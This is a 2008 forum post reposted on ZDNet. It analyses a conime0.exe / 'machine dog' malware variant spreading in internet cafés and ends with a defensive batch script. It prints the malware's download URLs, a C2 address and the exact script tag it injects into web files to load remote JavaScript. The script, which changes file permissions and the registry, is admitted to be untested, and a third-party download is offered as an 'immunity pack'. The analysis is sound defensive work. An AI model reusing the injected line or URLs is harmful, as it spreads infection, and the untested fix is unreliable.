科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道conime0.exe防范及解决方案

conime0.exe防范及解决方案

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

conime0.exe最近在网吧比较流行.昨晚去朋友网吧,抓了一个conime0.exe上来,应该是个变种.比较恶心的是,被修改的Userinit文件版本等信息都在,汗!还加入防杀的技术.

作者:论坛整理 来源:ZDNet网络安全 2008年3月26日

关键字: conime0.exe conime0.exe进程

  • 评论
  • 分享微博
  • 分享邮件

哎,这东西无敌了,最近在网吧比较流行.昨晚去朋友网吧,抓了一个上来,看了下,应该是个变种.比较恶心的是,被修改的Userinit文件版本等信息都在,汗!还加入防杀的技术```````

一开始是个被感染的Userinit.exe(23,552 字节)的样本

运行,释放usrinit.exe(少了个'e')于%systemroot%\system32下(11,124 字节)

注意,这个才是正常的,但是被做了处理

加了WinUpack的壳,所以数字签字丢了

不是主角,先54,继续....

然后那个Userinit.exe常驻进程,每隔1.5秒会访问网络124.74.201.19(上海市 电信)

所以可能会出现中标的机子一连接网线就中毒的情况

如果网路顺畅,就下木马,首先下载这个:

h**p://www.868wg.com/1/1/update.exe

基本特征:

1、尝试加载pcibus.sys(这个可能是重点)、usb32k.sys和pcidisk.sys,后面2个其实是PE文件。

2、启动%systemroot%\system32\Svchost.exe空壳进程,并把自己代码注入其中。

这时候被操控的Svchost.exe在进程中就等同于病毒。

这点比较狠毒,因为这个是系统文件,无法对其做权限设置,那么以前免疫机器狗的方法通通无效!!

3、查找硬盘htm/.html/.asp/.jsp/.php文件,插入一段代码:

<script language=javascript src=h**p://www.868wg.com/1/1/qq.js></script>

失效了好像``

4、连接网络,下载:

http://www.868wg.com/1/1/elf_listo.txt

获得木马下载列表,并下载

里面有很多连接失效了,搞不懂

我就看了后面几个(已失效),我记忆中机器狗和ARP病毒都是放在后面的连接...

5、可能会对硬盘中的EXE和COM文件做修改(跳过系统盘),但不是感染

用意还不知道,知道的请告诉我

6、病毒刚执行时,会访问pcibus.sys(应该是这个吧,不记得了)。

并把它的一些文件信息保存在:System32\utility.hiv

如果返回的信息无效,那可能会被判断为pcibus.sys是免疫文件夹或无效文件

这时候它会重新写入,并加载。

7、可能会查找一些窗口,并关闭。

具体是什么还不知道,壳没完全脱干净``

8、尝试访问磁盘底层,可能会因此穿还原(未验证)

我是看到那个病毒文件,有3个PE头,内有一驱动

具体是啥东西还不清楚,但是会对磁盘底层进行操作...

另外该病毒可能会利用MS06-040提权,完全控制该系统。

大概就是这些,因为实机,磁盘访问操作我阻止

至于这个东东能不能穿还原还不能肯定

但是不难看出,机器狗这次升级,可能会使以后的免疫工作更难做

..............

对于个人PC办法有很多,但是网吧就不好弄了...

只能暂时用cacls把pcibus.sys、usb32k.sys、pcidisk.sys暂时免疫下

如果可以的话,把注册表的驱动整个项,设置为只读...禁止加载驱动!

把下面复制到文本改成.bat,应该可以免疫:

md %systemroot%\system32\drivers\pcihdd.sys\免疫文件夹By孤独更可靠...\
md %systemroot%\system32\drivers\pcibus.sys\免疫文件夹By孤独更可靠...\
md %systemroot%\system32\drivers\pcidisk.sys\免疫文件夹By孤独更可靠...\
md %systemroot%\system32\drivers\usb32k.sys\免疫文件夹By孤独更可靠...\
md %systemroot%\System32\Com\comrepl32.exe\免疫文件夹By孤独更可靠...\
md "C:\Program Files\conime5.exe"\免疫文件夹By孤独更可靠...\
md "C:\Program Files\conime4.exe"\免疫文件夹By孤独更可靠...\
md "C:\Program Files\conime3.exe"\免疫文件夹By孤独更可靠...\
md "C:\Program Files\conime2.exe"\免疫文件夹By孤独更可靠...\
md "C:\Program Files\conime1.exe"\免疫文件夹By孤独更可靠...\
md "C:\Program Files\conime0.exe"\免疫文件夹By孤独更可靠...\
cacls %systemroot%\System32\Com\comrepl32.exe /e /p everyone:n
cacls %systemroot%\system32\drivers\pcihdd.sys /e /p everyone:n
cacls %systemroot%\system32\drivers\pcibus.sys /e /p everyone:n
cacls %systemroot%\system32\drivers\pcidisk.sys /e /p everyone:n
cacls %systemroot%\system32\drivers\usb32k.sys /e /p everyone:n
cacls %systemroot%\system32\userinit.exe /e /p everyone:r

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution

Options\comrepl32.exe" /v debugger /t reg_sz /d Explorer.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution

Options\conime0.exe" /v debugger /t reg_sz /d Explorer.exe /f

谁去测试下,我没测试。。。

免疫包,我上传了,有需要的去下````:

http://www.kingzoo.com/tools/孤独更可靠/病毒免疫.rar

对了,至于那个Userinit文件版本的文件,也不见得有什么了不起

雕虫小技

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章